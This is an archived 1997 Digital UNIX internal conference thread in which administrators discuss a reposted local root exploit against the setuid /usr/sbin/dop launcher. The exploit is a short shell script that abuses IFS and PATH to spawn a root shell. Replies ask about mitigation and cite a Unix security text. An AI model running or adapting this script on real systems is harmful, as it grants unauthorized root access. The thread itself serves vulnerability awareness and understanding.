| Title: | DIGITAL UNIX�(FORMERLY KNOWN AS DEC OSF/1) |
| Notice: | Welcome to the Digital UNIX Conference |
| Moderator: | SMURF::DENHAM |
| Created: | Thu Mar 16 1995 |
| Last Modified: | Fri Jun 06 1997 |
| Last Successful Update: | Fri Jun 06 1997 |
| Number of topics: | 10068 |
| Total number of notes: | 35879 |
The following has just appeared in the alpha-osf-managers mailing list:
(I hope that our developement people are already alerted.)
----------------------------------------------------------------------
Anyone can now grab root through a shell, anyone know what dop is used
for?
-------------------------cut here------------------------------------
#!/bin/sh
cat > /tmp/usr <<EOF
#!/bin/sh
IFS=" "
export IFS
exec /bin/sh
EOF
chmod 755 /tmp/usr
IFS=/ PATH=/tmp:$PATH /usr/sbin/dop crack-user=root
-------------------------cut here------------------------------------
run this script and get a free root shell.
---------------------------------------------------------------------
My comments and questions:
By running strings on /usr/sbin/dop it is obvious that it is some kind
of application launcher. It also has suid bit set.
The author thus intended that it will run applications normally
restricted to root.
The normal syntax is /usr/sbin/dop application arguments.
It also is probably a binary wrapper around a TCL script.
I guess TCL scripts get the environment setup somehow.
The attacker manipulates IFS - internal field separator
of shell to become /, which causes the prepared /tmp/usr
to be executed with root privilege.
I would like to know how exactly this manipulation works?
Normally carefully written suid programs are considered safe.
So what went wrong this time?
Regards,
Chris Jankowski
Melbourne Australia
| T.R | Title | User | Personal Name | Date | Lines |
|---|---|---|---|---|---|
| 9034.1 | See 9029.8 | OSL09::BJORNMY | Open but Secure | Wed Mar 05 1997 04:05 | 6 |
Hopefully now that the whole world knows, this basenote will not be
hidden.
The method is described in classical texts on Unix security.
Bj�rn
| |||||
| 9034.2 | SMURF::DENHAM | Digital UNIX Kernel | Wed Mar 05 1997 08:26 | 2 | |
Yeah, but maybe we can have just *1* note about it, instead of
3 and counting...
| |||||
| 9034.3 | CADSYS::BOGDANOV | Wed Mar 05 1997 09:53 | 2 | ||
Can anyone tell where the 'dop' is used and what for? Can one just remove it or change 's' bit? | |||||
| 9034.4 | See 9029.1 | SUBPAC::FARICELLI | Wed Mar 05 1997 10:16 | 0 | |
| 9034.5 | SEE NOTE 9029.11 ** | BSS::BOREN | Wed Mar 05 1997 21:03 | 1 | |
| 9034.6 | Reference to a book on Unix security. | MEOC02::JANKOWSKI | Mon Mar 10 1997 07:23 | 9 | |
Re.1
I did some background reading.
The best reference I found is in "Practical Unix and Internet Security"
by Garfinkel and Spafford (O'Reilly and Assoc., second edition 1996).
See pages 124-125.
Chris Jankowski
Melbourne Australia
| |||||